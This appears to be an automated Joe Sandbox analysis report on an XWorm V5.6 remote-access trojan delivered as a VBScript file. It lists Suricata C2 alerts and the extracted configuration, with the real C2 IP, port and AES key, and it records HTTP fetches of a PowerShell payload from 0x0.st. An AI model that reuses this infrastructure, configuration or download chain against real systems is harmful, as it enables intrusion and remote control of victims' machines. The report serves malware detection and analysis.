                2025-02-15T20:44:12.664341+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.811358+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.955482+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.080173+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.204120+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.312674+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.421950+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.547059+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.656727+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.781895+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.890470+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.999922+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.109235+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.234340+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.344023+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.459354+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.608364+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.910934+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.063498+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.182211+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.297458+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.409110+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.531342+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.642172+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.767796+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.895376+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.047258+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.166688+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.301822+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.428869+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.574977+010028529231Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:45:39.970391+010028529231Malware Command and Control Activity Detected192.168.2.450051185.241.208.2157000TCP
                2025-02-15T20:45:53.778510+010028529231Malware Command and Control Activity Detected192.168.2.450051185.241.208.2157000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:43:52.078578+010028528741Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:44:22.079816+010028528741Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                2025-02-15T20:45:52.079853+010028528741Malware Command and Control Activity Detected185.241.208.2157000192.168.2.450051TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:44:06.772243+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:06.996526+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.124893+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.234396+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.344034+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.468544+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.578359+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.703005+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.812533+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:07.921690+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.041096+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.140675+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.250084+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.359472+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.484168+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.615357+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.718633+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.827953+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:08.947197+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.046727+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.170616+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.285823+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.456448+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.718568+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.828072+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:09.937533+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.074336+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.187410+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.296806+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.417846+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.532933+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.640672+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.750825+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.866817+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:10.985467+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.126720+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.250700+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.436495+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.482756+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.635622+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.752453+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:11.917801+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.232133+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.399346+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.536215+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.664341+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.811358+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:12.955482+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.080173+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.204120+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.312674+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.421950+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.547059+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.656727+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.781895+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.890470+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:13.999922+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.109235+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.234340+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.344023+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.459354+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.608364+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:14.910934+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.063498+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.182211+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.297458+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.409110+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.531342+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.642172+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.767796+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:15.895376+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.047258+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.166688+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.301822+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.428869+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                2025-02-15T20:44:16.574977+010028528731Malware Command and Control Activity Detected192.168.2.449741185.241.208.2157000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:43:34.393856+010028559241Malware Command and Control Activity Detected192.168.2.449736185.241.208.2157000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:44:06.555717+010028531911Malware Command and Control Activity Detected185.241.208.2157000192.168.2.449736TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:44:06.280176+010028531921Malware Command and Control Activity Detected192.168.2.449736185.241.208.2157000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-15T20:43:17.557553+010018100002Potentially Bad Traffic192.168.2.449734168.119.145.117443TCP
                2025-02-15T20:43:34.144742+010018100002Potentially Bad Traffic192.168.2.449738168.119.145.117443TCP
                2025-02-15T20:43:47.055557+010018100002Potentially Bad Traffic192.168.2.449739168.119.145.117443TCP
                2025-02-15T20:44:00.816978+010018100002Potentially Bad Traffic192.168.2.449740168.119.145.117443TCP
                2025-02-15T20:44:14.396511+010018100002Potentially Bad Traffic192.168.2.449759168.119.145.117443TCP
                2025-02-15T20:45:16.041932+010018100002Potentially Bad Traffic192.168.2.450042168.119.145.117443TCP
                2025-02-15T20:45:16.058701+010018100002Potentially Bad Traffic192.168.2.450044168.119.145.117443TCP
                2025-02-15T20:45:16.063078+010018100002Potentially Bad Traffic192.168.2.450043168.119.145.117443TCP
                2025-02-15T20:45:16.201202+010018100002Potentially Bad Traffic192.168.2.450045168.119.145.117443TCP
                2025-02-15T20:45:16.339155+010018100002Potentially Bad Traffic192.168.2.450047168.119.145.117443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["185.241.208.215"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Multi AV Scanner detection for submitted file
                Source: Xclient.vbsVirustotal: Detection: 8%Perma Link
                Source: Xclient.vbsReversingLabs: Detection: 27%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                Sample uses string decryption to hide its real strings
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpString decryptor: 185.241.208.215
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpString decryptor: 7000
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50042 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50044 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50043 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50045 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.4:50047 version: TLS 1.2
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B8C6955h5_2_00007FFD9B8C625D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B8C6966h5_2_00007FFD9B8C625D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B8C5B9Bh5_2_00007FFD9B8C59F2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD9B8C7576h5_2_00007FFD9B8C0CB0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.241.208.215:7000 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.4:49741 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49741 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 185.241.208.215:7000 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 185.241.208.215:7000 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.241.208.215:7000 -> 192.168.2.4:49741
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.241.208.215:7000 -> 192.168.2.4:50051
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:50051 -> 185.241.208.215:7000
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 185.241.208.215:7000 -> 192.168.2.4:50051
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 185.241.208.215
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 185.241.208.215:7000
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewIP Address: 168.119.145.117 168.119.145.117
                Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ip-api.com
                Source: unknownDNS query: name: ip-api.com
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49734 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49738 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49740 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49739 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49759 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50045 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50042 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50015 -> 204.79.197.203:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50047 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50043 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:50044 -> 168.119.145.117:443
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: unknownTCP traffic detected without corresponding DNS query: 185.241.208.215
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
